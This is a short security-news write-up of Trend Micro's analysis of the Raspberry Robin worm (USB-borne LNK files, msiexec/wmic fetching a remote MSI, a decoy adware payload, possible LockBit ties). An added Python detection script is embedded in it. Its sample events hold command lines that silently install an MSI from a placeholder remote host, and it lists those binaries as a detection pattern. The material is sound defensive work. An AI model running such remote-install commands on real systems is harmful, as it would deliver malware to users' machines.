Researchers at Trend Micro have been tracking Raspberry Robin since September and are warning the worm is notable for its 10 layers of obfuscation and its ability to deploy a fake payload to throw off detection efforts.
The malware is known for relying on infected USB drives as a distribution vector to download a rogue MSI installer file that deploys the main payload responsible for facilitating post-exploitation.
The payload loader, for its part, is orchestrated to load the decoy payload, an adware dubbed BrowserAssistant, to throw off detection efforts.
Trend Micro said it found similarities in a privilege escalation and an anti-debugging technique used by Raspberry Robin and LockBit ransomware, hinting at a potential connection between the two criminal actors.

Once the user connects the infected USB to the system, Raspberry Robin initially arrives as a shortcut or LNK file. The LNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package. This legitimate executable is usually msiexec.exe, but we have also seen wmic.exe used in other samples.
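The initial-access step described above (an LNK launching msiexec.exe or wmic.exe to fetch a remote MSI) is something a SOC can hunt for in process-creation telemetry. The following is an added detection example, not code from the article or from Trend Micro; the event records, field names and the `example-placeholder.invalid` URLs are all constructed for illustration.

```python
import re
from typing import Dict, Iterable, List

# Constructed process-creation events in the shape a Sysmon Event ID 1 or EDR feed
# would provide (parent image, child image, command line). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /q /i "http://example-placeholder.invalid/pkg.msi"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic.exe product call install true,"","HTTPS://example-placeholder.invalid/pkg.msi"'},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /V"},                       # MSI service start: benign
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\alice\Downloads\tool.msi"'},  # local install: benign
]

# The two living-off-the-land binaries the article names as the LNK's download vehicle.
LOLBIN_NAMES = {"msiexec.exe", "wmic.exe"}
# Any http(s) URL in the command line; case-insensitive so "HTTPS://" is not missed.
URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_msi_install(event: Dict[str, str]) -> bool:
    """True when msiexec.exe or wmic.exe is handed a remote URL on its command line."""
    if basename(event["image"]) not in LOLBIN_NAMES:
        return False
    return URL_RE.search(event["cmdline"]) is not None


def triage(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per suspicious event: the binary, the URL it was given and
    whether it was spawned from the user's shell, which is what an LNK double-click
    from a USB drive looks like in parent/child telemetry."""
    findings = []
    for ev in events:
        if not is_remote_msi_install(ev):
            continue
        findings.append({
            "binary": basename(ev["image"]),
            "url": URL_RE.search(ev["cmdline"]).group(0),
            "from_user_shell": basename(ev["parent"]) == "explorer.exe",
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

A local-file install is deliberately left out of the findings; a remote-URL install with explorer.exe as parent is the pattern worth alerting on and pairing with USB-insertion events.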
Trend Micro’s analysts comment that the recent additions in Raspberry Robin’s TTPs (tactics, techniques, and procedures) bear similarities to LockBit, so the two projects might have a connection.